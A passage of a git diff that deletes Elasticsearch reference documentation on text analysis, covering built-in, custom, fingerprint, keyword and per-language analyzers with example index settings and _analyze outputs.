- -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - "took": 11, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "sales_per_month": { - "buckets": [ - { - "key_as_string": "2015/01/01 00:00:00", - "key": 1420070400000, - "doc_count": 3, - "sales": { - "value": 550.0 - } - }, - { - "key_as_string": "2015/02/01 00:00:00", - "key": 1422748800000, - "doc_count": 2, - "sales": { - "value": 60.0 - } - }, - { - "key_as_string": "2015/03/01 00:00:00", - "key": 1425168000000, - "doc_count": 2, - "sales": { - "value": 375.0 - } - } - ] - }, - "sum_monthly_sales": { - "value": 985.0 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 11/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] diff --git a/docs/reference/analysis.asciidoc b/docs/reference/analysis.asciidoc deleted file mode 100644 index 15684f60a88..00000000000 --- a/docs/reference/analysis.asciidoc +++ /dev/null @@ -1,61 +0,0 @@ -[[analysis]] -= Text analysis - -:lucene-analysis-docs: https://lucene.apache.org/core/{lucene_version_path}/analyzers-common/org/apache/lucene/analysis -:lucene-stop-word-link: https://github.com/apache/lucene-solr/blob/master/lucene/analysis/common/src/resources/org/apache/lucene/analysis - -[partintro] --- - -_Text analysis_ is the process of converting unstructured text, like -the body of an email or a product description, into a structured format that's -optimized for search. - -[discrete] -[[when-to-configure-analysis]] -=== When to configure text analysis - -{es} performs text analysis when indexing or searching <> fields. - -If your index doesn't contain `text` fields, no further setup is needed; you can -skip the pages in this section. - -However, if you use `text` fields or your text searches aren't returning results -as expected, configuring text analysis can often help. You should also look into -analysis configuration if you're using {es} to: - -* Build a search engine -* Mine unstructured data -* Fine-tune search for a specific language -* Perform lexicographic or linguistic research - -[discrete] -[[analysis-toc]] -=== In this section - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - --- - -include::analysis/overview.asciidoc[] - -include::analysis/concepts.asciidoc[] - -include::analysis/configure-text-analysis.asciidoc[] - -include::analysis/analyzers.asciidoc[] - -include::analysis/tokenizers.asciidoc[] - -include::analysis/tokenfilters.asciidoc[] - -include::analysis/charfilters.asciidoc[] - -include::analysis/normalizers.asciidoc[] \ No newline at end of file diff --git a/docs/reference/analysis/analyzers.asciidoc b/docs/reference/analysis/analyzers.asciidoc deleted file mode 100644 index 15e8fb435f2..00000000000 --- a/docs/reference/analysis/analyzers.asciidoc +++ /dev/null @@ -1,71 +0,0 @@ -[[analysis-analyzers]] -== Built-in analyzer reference - -Elasticsearch ships with a wide range of built-in analyzers, which can be used -in any index without further configuration: - -<>:: - -The `standard` analyzer divides text into terms on word boundaries, as defined -by the Unicode Text Segmentation algorithm. It removes most punctuation, -lowercases terms, and supports removing stop words. - -<>:: - -The `simple` analyzer divides text into terms whenever it encounters a -character which is not a letter. It lowercases all terms. 
- -<>:: - -The `whitespace` analyzer divides text into terms whenever it encounters any -whitespace character. It does not lowercase terms. - -<>:: - -The `stop` analyzer is like the `simple` analyzer, but also supports removal -of stop words. - -<>:: - -The `keyword` analyzer is a ``noop'' analyzer that accepts whatever text it is -given and outputs the exact same text as a single term. - -<>:: - -The `pattern` analyzer uses a regular expression to split the text into terms. -It supports lower-casing and stop words. - -<>:: - -Elasticsearch provides many language-specific analyzers like `english` or -`french`. - -<>:: - -The `fingerprint` analyzer is a specialist analyzer which creates a -fingerprint which can be used for duplicate detection. - -[discrete] -=== Custom analyzers - -If you do not find an analyzer suitable for your needs, you can create a -<> analyzer which combines the appropriate -<>, -<>, and <>. - - -include::analyzers/fingerprint-analyzer.asciidoc[] - -include::analyzers/keyword-analyzer.asciidoc[] - -include::analyzers/lang-analyzer.asciidoc[] - -include::analyzers/pattern-analyzer.asciidoc[] - -include::analyzers/simple-analyzer.asciidoc[] - -include::analyzers/standard-analyzer.asciidoc[] - -include::analyzers/stop-analyzer.asciidoc[] - -include::analyzers/whitespace-analyzer.asciidoc[] \ No newline at end of file diff --git a/docs/reference/analysis/analyzers/configuring.asciidoc b/docs/reference/analysis/analyzers/configuring.asciidoc deleted file mode 100644 index c848004c4f0..00000000000 --- a/docs/reference/analysis/analyzers/configuring.asciidoc +++ /dev/null @@ -1,94 +0,0 @@ -[[configuring-analyzers]] -=== Configuring built-in analyzers - -The built-in analyzers can be used directly without any configuration. Some -of them, however, support configuration options to alter their behaviour. For -instance, the <> can be configured -to support a list of stop words: - -[source,console] --------------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "std_english": { <1> - "type": "standard", - "stopwords": "_english_" - } - } - } - }, - "mappings": { - "properties": { - "my_text": { - "type": "text", - "analyzer": "standard", <2> - "fields": { - "english": { - "type": "text", - "analyzer": "std_english" <3> - } - } - } - } - } -} - -POST my-index-000001/_analyze -{ - "field": "my_text", <2> - "text": "The old brown cow" -} - -POST my-index-000001/_analyze -{ - "field": "my_text.english", <3> - "text": "The old brown cow" -} - --------------------------------- - -<1> We define the `std_english` analyzer to be based on the `standard` - analyzer, but configured to remove the pre-defined list of English stopwords. -<2> The `my_text` field uses the `standard` analyzer directly, without - any configuration. No stop words will be removed from this field. - The resulting terms are: `[ the, old, brown, cow ]` -<3> The `my_text.english` field uses the `std_english` analyzer, so - English stop words will be removed. 
The resulting terms are: - `[ old, brown, cow ]` - - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "old", - "start_offset": 4, - "end_offset": 7, - "type": "", - "position": 1 - }, - { - "token": "brown", - "start_offset": 8, - "end_offset": 13, - "type": "", - "position": 2 - }, - { - "token": "cow", - "start_offset": 14, - "end_offset": 17, - "type": "", - "position": 3 - } - ] -} ----------------------------- - -///////////////////// diff --git a/docs/reference/analysis/analyzers/custom-analyzer.asciidoc b/docs/reference/analysis/analyzers/custom-analyzer.asciidoc deleted file mode 100644 index 3757a0c3be3..00000000000 --- a/docs/reference/analysis/analyzers/custom-analyzer.asciidoc +++ /dev/null @@ -1,260 +0,0 @@ -[[analysis-custom-analyzer]] -=== Create a custom analyzer - -When the built-in analyzers do not fulfill your needs, you can create a -`custom` analyzer which uses the appropriate combination of: - -* zero or more <> -* a <> -* zero or more <>. - -[discrete] -=== Configuration - -The `custom` analyzer accepts the following parameters: - -[horizontal] -`tokenizer`:: - - A built-in or customised <>. - (Required) - -`char_filter`:: - - An optional array of built-in or customised - <>. - -`filter`:: - - An optional array of built-in or customised - <>. - -`position_increment_gap`:: - - When indexing an array of text values, Elasticsearch inserts a fake "gap" - between the last term of one value and the first term of the next value to - ensure that a phrase query doesn't match two terms from different array - elements. Defaults to `100`. See <> for more. - -[discrete] -=== Example configuration - -Here is an example that combines the following: - -Character Filter:: -* <> - -Tokenizer:: -* <> - -Token Filters:: -* <> -* <> - -[source,console] --------------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_custom_analyzer": { - "type": "custom", <1> - "tokenizer": "standard", - "char_filter": [ - "html_strip" - ], - "filter": [ - "lowercase", - "asciifolding" - ] - } - } - } - } -} - -POST my-index-000001/_analyze -{ - "analyzer": "my_custom_analyzer", - "text": "Is this déjà vu?" -} --------------------------------- - -<1> Setting `type` to `custom` tells Elasticsearch that we are defining a custom analyzer. - Compare this to how <>: - `type` will be set to the name of the built-in analyzer, like - <> or <>. - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "is", - "start_offset": 0, - "end_offset": 2, - "type": "", - "position": 0 - }, - { - "token": "this", - "start_offset": 3, - "end_offset": 7, - "type": "", - "position": 1 - }, - { - "token": "deja", - "start_offset": 11, - "end_offset": 15, - "type": "", - "position": 2 - }, - { - "token": "vu", - "start_offset": 16, - "end_offset": 22, - "type": "", - "position": 3 - } - ] -} ----------------------------- - -///////////////////// - - -The above example produces the following terms: - -[source,text] ---------------------------- -[ is, this, deja, vu ] ---------------------------- - -The previous example used tokenizer, token filters, and character filters with -their default configurations, but it is possible to create configured versions -of each and to use them in a custom analyzer. 
- -Here is a more complicated example that combines the following: - -Character Filter:: -* <>, configured to replace `:)` with `_happy_` and `:(` with `_sad_` - -Tokenizer:: -* <>, configured to split on punctuation characters - -Token Filters:: -* <> -* <>, configured to use the pre-defined list of English stop words - - -Here is an example: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_custom_analyzer": { <1> - "type": "custom", - "char_filter": [ - "emoticons" - ], - "tokenizer": "punctuation", - "filter": [ - "lowercase", - "english_stop" - ] - } - }, - "tokenizer": { - "punctuation": { <2> - "type": "pattern", - "pattern": "[ .,!?]" - } - }, - "char_filter": { - "emoticons": { <3> - "type": "mapping", - "mappings": [ - ":) => _happy_", - ":( => _sad_" - ] - } - }, - "filter": { - "english_stop": { <4> - "type": "stop", - "stopwords": "_english_" - } - } - } - } -} - -POST my-index-000001/_analyze -{ - "analyzer": "my_custom_analyzer", - "text": "I'm a :) person, and you?" -} --------------------------------------------------- - -<1> Assigns the index a default custom analyzer, `my_custom_analyzer`. This -analyzer uses a custom tokenizer, character filter, and token filter that -are defined later in the request. -<2> Defines the custom `punctuation` tokenizer. -<3> Defines the custom `emoticons` character filter. -<4> Defines the custom `english_stop` token filter. - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "i'm", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0 - }, - { - "token": "_happy_", - "start_offset": 6, - "end_offset": 8, - "type": "word", - "position": 2 - }, - { - "token": "person", - "start_offset": 9, - "end_offset": 15, - "type": "word", - "position": 3 - }, - { - "token": "you", - "start_offset": 21, - "end_offset": 24, - "type": "word", - "position": 5 - } - ] -} ----------------------------- - -///////////////////// - - -The above example produces the following terms: - -[source,text] ---------------------------- -[ i'm, _happy_, person, you ] ---------------------------- diff --git a/docs/reference/analysis/analyzers/fingerprint-analyzer.asciidoc b/docs/reference/analysis/analyzers/fingerprint-analyzer.asciidoc deleted file mode 100644 index f66acb452c4..00000000000 --- a/docs/reference/analysis/analyzers/fingerprint-analyzer.asciidoc +++ /dev/null @@ -1,178 +0,0 @@ -[[analysis-fingerprint-analyzer]] -=== Fingerprint analyzer -++++ -Fingerprint -++++ - -The `fingerprint` analyzer implements a -https://github.com/OpenRefine/OpenRefine/wiki/Clustering-In-Depth#fingerprint[fingerprinting algorithm] -which is used by the OpenRefine project to assist in clustering. - -Input text is lowercased, normalized to remove extended characters, sorted, -deduplicated and concatenated into a single token. If a stopword list is -configured, stop words will also be removed. - -[discrete] -=== Example output - -[source,console] ---------------------------- -POST _analyze -{ - "analyzer": "fingerprint", - "text": "Yes yes, Gödel said this sentence is consistent and." 
-} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "and consistent godel is said sentence this yes", - "start_offset": 0, - "end_offset": 52, - "type": "fingerprint", - "position": 0 - } - ] -} ----------------------------- - -///////////////////// - - -The above sentence would produce the following single term: - -[source,text] ---------------------------- -[ and consistent godel is said sentence this yes ] ---------------------------- - -[discrete] -=== Configuration - -The `fingerprint` analyzer accepts the following parameters: - -[horizontal] -`separator`:: - - The character to use to concatenate the terms. Defaults to a space. - -`max_output_size`:: - - The maximum token size to emit. Defaults to `255`. Tokens larger than - this size will be discarded. - -`stopwords`:: - - A pre-defined stop words list like `_english_` or an array containing a - list of stop words. Defaults to `_none_`. - -`stopwords_path`:: - - The path to a file containing stop words. - -See the <> for more information -about stop word configuration. - - -[discrete] -=== Example configuration - -In this example, we configure the `fingerprint` analyzer to use the -pre-defined list of English stop words: - -[source,console] ----------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_fingerprint_analyzer": { - "type": "fingerprint", - "stopwords": "_english_" - } - } - } - } -} - -POST my-index-000001/_analyze -{ - "analyzer": "my_fingerprint_analyzer", - "text": "Yes yes, Gödel said this sentence is consistent and." -} ----------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "consistent godel said sentence yes", - "start_offset": 0, - "end_offset": 52, - "type": "fingerprint", - "position": 0 - } - ] -} ----------------------------- - -///////////////////// - - -The above example produces the following term: - -[source,text] ---------------------------- -[ consistent godel said sentence yes ] ---------------------------- - -[discrete] -=== Definition - -The `fingerprint` tokenizer consists of: - -Tokenizer:: -* <> - -Token Filters (in order):: -* <> -* <> -* <> (disabled by default) -* <> - -If you need to customize the `fingerprint` analyzer beyond the configuration -parameters then you need to recreate it as a `custom` analyzer and modify -it, usually by adding token filters. 
This would recreate the built-in -`fingerprint` analyzer and you can use it as a starting point for further -customization: - -[source,console] ----------------------------------------------------- -PUT /fingerprint_example -{ - "settings": { - "analysis": { - "analyzer": { - "rebuilt_fingerprint": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "asciifolding", - "fingerprint" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: fingerprint_example, first: fingerprint, second: rebuilt_fingerprint}\nendyaml\n/] diff --git a/docs/reference/analysis/analyzers/keyword-analyzer.asciidoc b/docs/reference/analysis/analyzers/keyword-analyzer.asciidoc deleted file mode 100644 index 888376bc46f..00000000000 --- a/docs/reference/analysis/analyzers/keyword-analyzer.asciidoc +++ /dev/null @@ -1,89 +0,0 @@ -[[analysis-keyword-analyzer]] -=== Keyword analyzer -++++ -Keyword -++++ - -The `keyword` analyzer is a ``noop'' analyzer which returns the entire input -string as a single token. - -[discrete] -=== Example output - -[source,console] ---------------------------- -POST _analyze -{ - "analyzer": "keyword", - "text": "The 2 QUICK Brown-Foxes jumped over the lazy dog's bone." -} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "The 2 QUICK Brown-Foxes jumped over the lazy dog's bone.", - "start_offset": 0, - "end_offset": 56, - "type": "word", - "position": 0 - } - ] -} ----------------------------- - -///////////////////// - - -The above sentence would produce the following single term: - -[source,text] ---------------------------- -[ The 2 QUICK Brown-Foxes jumped over the lazy dog's bone. ] ---------------------------- - -[discrete] -=== Configuration - -The `keyword` analyzer is not configurable. - -[discrete] -=== Definition - -The `keyword` analyzer consists of: - -Tokenizer:: -* <> - -If you need to customize the `keyword` analyzer then you need to -recreate it as a `custom` analyzer and modify it, usually by adding -token filters. Usually, you should prefer the -<> when you want strings that are not split -into tokens, but just in case you need it, this would recreate the -built-in `keyword` analyzer and you can use it as a starting point -for further customization: - -[source,console] ----------------------------------------------------- -PUT /keyword_example -{ - "settings": { - "analysis": { - "analyzer": { - "rebuilt_keyword": { - "tokenizer": "keyword", - "filter": [ <1> - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: keyword_example, first: keyword, second: rebuilt_keyword}\nendyaml\n/] - -<1> You'd add any token filters here. diff --git a/docs/reference/analysis/analyzers/lang-analyzer.asciidoc b/docs/reference/analysis/analyzers/lang-analyzer.asciidoc deleted file mode 100644 index e6c08fe4da1..00000000000 --- a/docs/reference/analysis/analyzers/lang-analyzer.asciidoc +++ /dev/null @@ -1,1825 +0,0 @@ -[[analysis-lang-analyzer]] -=== Language analyzers -++++ -Language -++++ - -A set of analyzers aimed at analyzing specific language text. The -following types are supported: -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>, -<>. 
- -==== Configuring language analyzers - -===== Stopwords - -All analyzers support setting custom `stopwords` either internally in -the config, or by using an external stopwords file by setting -`stopwords_path`. Check <> for -more details. - -[[_excluding_words_from_stemming]] -===== Excluding words from stemming - -The `stem_exclusion` parameter allows you to specify an array -of lowercase words that should not be stemmed. Internally, this -functionality is implemented by adding the -<> -with the `keywords` set to the value of the `stem_exclusion` parameter. - -The following analyzers support setting custom `stem_exclusion` list: -`arabic`, `armenian`, `basque`, `bengali`, `bulgarian`, `catalan`, `czech`, -`dutch`, `english`, `finnish`, `french`, `galician`, -`german`, `hindi`, `hungarian`, `indonesian`, `irish`, `italian`, `latvian`, -`lithuanian`, `norwegian`, `portuguese`, `romanian`, `russian`, `sorani`, -`spanish`, `swedish`, `turkish`. - -==== Reimplementing language analyzers - -The built-in language analyzers can be reimplemented as `custom` analyzers -(as described below) in order to customize their behaviour. - -NOTE: If you do not intend to exclude words from being stemmed (the -equivalent of the `stem_exclusion` parameter above), then you should remove -the `keyword_marker` token filter from the custom analyzer configuration. - -[[arabic-analyzer]] -===== `arabic` analyzer - -The `arabic` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /arabic_example -{ - "settings": { - "analysis": { - "filter": { - "arabic_stop": { - "type": "stop", - "stopwords": "_arabic_" <1> - }, - "arabic_keywords": { - "type": "keyword_marker", - "keywords": ["مثال"] <2> - }, - "arabic_stemmer": { - "type": "stemmer", - "language": "arabic" - } - }, - "analyzer": { - "rebuilt_arabic": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "decimal_digit", - "arabic_stop", - "arabic_normalization", - "arabic_keywords", - "arabic_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"arabic_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: arabic_example, first: arabic, second: rebuilt_arabic}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[armenian-analyzer]] -===== `armenian` analyzer - -The `armenian` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /armenian_example -{ - "settings": { - "analysis": { - "filter": { - "armenian_stop": { - "type": "stop", - "stopwords": "_armenian_" <1> - }, - "armenian_keywords": { - "type": "keyword_marker", - "keywords": ["օրինակ"] <2> - }, - "armenian_stemmer": { - "type": "stemmer", - "language": "armenian" - } - }, - "analyzer": { - "rebuilt_armenian": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "armenian_stop", - "armenian_keywords", - "armenian_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"armenian_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: armenian_example, first: armenian, second: rebuilt_armenian}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. 
-<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[basque-analyzer]] -===== `basque` analyzer - -The `basque` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /basque_example -{ - "settings": { - "analysis": { - "filter": { - "basque_stop": { - "type": "stop", - "stopwords": "_basque_" <1> - }, - "basque_keywords": { - "type": "keyword_marker", - "keywords": ["Adibidez"] <2> - }, - "basque_stemmer": { - "type": "stemmer", - "language": "basque" - } - }, - "analyzer": { - "rebuilt_basque": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "basque_stop", - "basque_keywords", - "basque_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"basque_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: basque_example, first: basque, second: rebuilt_basque}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[bengali-analyzer]] -===== `bengali` analyzer - -The `bengali` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /bengali_example -{ - "settings": { - "analysis": { - "filter": { - "bengali_stop": { - "type": "stop", - "stopwords": "_bengali_" <1> - }, - "bengali_keywords": { - "type": "keyword_marker", - "keywords": ["উদাহরণ"] <2> - }, - "bengali_stemmer": { - "type": "stemmer", - "language": "bengali" - } - }, - "analyzer": { - "rebuilt_bengali": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "decimal_digit", - "bengali_keywords", - "indic_normalization", - "bengali_normalization", - "bengali_stop", - "bengali_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"bengali_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: bengali_example, first: bengali, second: rebuilt_bengali}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[brazilian-analyzer]] -===== `brazilian` analyzer - -The `brazilian` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /brazilian_example -{ - "settings": { - "analysis": { - "filter": { - "brazilian_stop": { - "type": "stop", - "stopwords": "_brazilian_" <1> - }, - "brazilian_keywords": { - "type": "keyword_marker", - "keywords": ["exemplo"] <2> - }, - "brazilian_stemmer": { - "type": "stemmer", - "language": "brazilian" - } - }, - "analyzer": { - "rebuilt_brazilian": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "brazilian_stop", - "brazilian_keywords", - "brazilian_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"brazilian_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: brazilian_example, first: brazilian, second: rebuilt_brazilian}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. 
- -[[bulgarian-analyzer]] -===== `bulgarian` analyzer - -The `bulgarian` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /bulgarian_example -{ - "settings": { - "analysis": { - "filter": { - "bulgarian_stop": { - "type": "stop", - "stopwords": "_bulgarian_" <1> - }, - "bulgarian_keywords": { - "type": "keyword_marker", - "keywords": ["пример"] <2> - }, - "bulgarian_stemmer": { - "type": "stemmer", - "language": "bulgarian" - } - }, - "analyzer": { - "rebuilt_bulgarian": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "bulgarian_stop", - "bulgarian_keywords", - "bulgarian_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"bulgarian_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: bulgarian_example, first: bulgarian, second: rebuilt_bulgarian}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[catalan-analyzer]] -===== `catalan` analyzer - -The `catalan` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /catalan_example -{ - "settings": { - "analysis": { - "filter": { - "catalan_elision": { - "type": "elision", - "articles": [ "d", "l", "m", "n", "s", "t"], - "articles_case": true - }, - "catalan_stop": { - "type": "stop", - "stopwords": "_catalan_" <1> - }, - "catalan_keywords": { - "type": "keyword_marker", - "keywords": ["example"] <2> - }, - "catalan_stemmer": { - "type": "stemmer", - "language": "catalan" - } - }, - "analyzer": { - "rebuilt_catalan": { - "tokenizer": "standard", - "filter": [ - "catalan_elision", - "lowercase", - "catalan_stop", - "catalan_keywords", - "catalan_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"catalan_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: catalan_example, first: catalan, second: rebuilt_catalan}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[cjk-analyzer]] -===== `cjk` analyzer - -NOTE: You may find that `icu_analyzer` in the ICU analysis plugin works better -for CJK text than the `cjk` analyzer. Experiment with your text and queries. 
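
The quickest way to run that experiment is to push the same text through both analyzers with the `_analyze` API and compare the token streams. Below is a minimal sketch using Python's `requests` library; the host URL and the sample text are assumptions, and `icu_analyzer` is only available once the `analysis-icu` plugin has been installed.

[source,python]
----------------------------------------------------
import requests

ES = "http://localhost:9200"  # assumed local cluster
text = "東京スカイツリーの最寄り駅はとうきょうスカイツリー駅です"

# `cjk` ships with Elasticsearch; `icu_analyzer` comes from the analysis-icu plugin.
for analyzer in ("cjk", "icu_analyzer"):
    resp = requests.post(f"{ES}/_analyze", json={"analyzer": analyzer, "text": text})
    resp.raise_for_status()
    print(analyzer, [t["token"] for t in resp.json()["tokens"]])
----------------------------------------------------

Whichever analyzer produces tokens closer to the units your users actually search for is the better choice for your text.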
- -The `cjk` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /cjk_example -{ - "settings": { - "analysis": { - "filter": { - "english_stop": { - "type": "stop", - "stopwords": [ <1> - "a", "and", "are", "as", "at", "be", "but", "by", "for", - "if", "in", "into", "is", "it", "no", "not", "of", "on", - "or", "s", "such", "t", "that", "the", "their", "then", - "there", "these", "they", "this", "to", "was", "will", - "with", "www" - ] - } - }, - "analyzer": { - "rebuilt_cjk": { - "tokenizer": "standard", - "filter": [ - "cjk_width", - "lowercase", - "cjk_bigram", - "english_stop" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"cjk_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: cjk_example, first: cjk, second: rebuilt_cjk}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. The default stop words are - *almost* the same as the `_english_` set, but not exactly - the same. - -[[czech-analyzer]] -===== `czech` analyzer - -The `czech` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /czech_example -{ - "settings": { - "analysis": { - "filter": { - "czech_stop": { - "type": "stop", - "stopwords": "_czech_" <1> - }, - "czech_keywords": { - "type": "keyword_marker", - "keywords": ["příklad"] <2> - }, - "czech_stemmer": { - "type": "stemmer", - "language": "czech" - } - }, - "analyzer": { - "rebuilt_czech": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "czech_stop", - "czech_keywords", - "czech_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"czech_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: czech_example, first: czech, second: rebuilt_czech}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[danish-analyzer]] -===== `danish` analyzer - -The `danish` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /danish_example -{ - "settings": { - "analysis": { - "filter": { - "danish_stop": { - "type": "stop", - "stopwords": "_danish_" <1> - }, - "danish_keywords": { - "type": "keyword_marker", - "keywords": ["eksempel"] <2> - }, - "danish_stemmer": { - "type": "stemmer", - "language": "danish" - } - }, - "analyzer": { - "rebuilt_danish": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "danish_stop", - "danish_keywords", - "danish_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"danish_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: danish_example, first: danish, second: rebuilt_danish}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. 
- -[[dutch-analyzer]] -===== `dutch` analyzer - -The `dutch` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /dutch_example -{ - "settings": { - "analysis": { - "filter": { - "dutch_stop": { - "type": "stop", - "stopwords": "_dutch_" <1> - }, - "dutch_keywords": { - "type": "keyword_marker", - "keywords": ["voorbeeld"] <2> - }, - "dutch_stemmer": { - "type": "stemmer", - "language": "dutch" - }, - "dutch_override": { - "type": "stemmer_override", - "rules": [ - "fiets=>fiets", - "bromfiets=>bromfiets", - "ei=>eier", - "kind=>kinder" - ] - } - }, - "analyzer": { - "rebuilt_dutch": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "dutch_stop", - "dutch_keywords", - "dutch_override", - "dutch_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"dutch_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: dutch_example, first: dutch, second: rebuilt_dutch}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[english-analyzer]] -===== `english` analyzer - -The `english` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /english_example -{ - "settings": { - "analysis": { - "filter": { - "english_stop": { - "type": "stop", - "stopwords": "_english_" <1> - }, - "english_keywords": { - "type": "keyword_marker", - "keywords": ["example"] <2> - }, - "english_stemmer": { - "type": "stemmer", - "language": "english" - }, - "english_possessive_stemmer": { - "type": "stemmer", - "language": "possessive_english" - } - }, - "analyzer": { - "rebuilt_english": { - "tokenizer": "standard", - "filter": [ - "english_possessive_stemmer", - "lowercase", - "english_stop", - "english_keywords", - "english_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"english_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: english_example, first: english, second: rebuilt_english}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[estonian-analyzer]] -===== `estonian` analyzer - -The `estonian` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /estonian_example -{ - "settings": { - "analysis": { - "filter": { - "estonian_stop": { - "type": "stop", - "stopwords": "_estonian_" <1> - }, - "estonian_keywords": { - "type": "keyword_marker", - "keywords": ["näide"] <2> - }, - 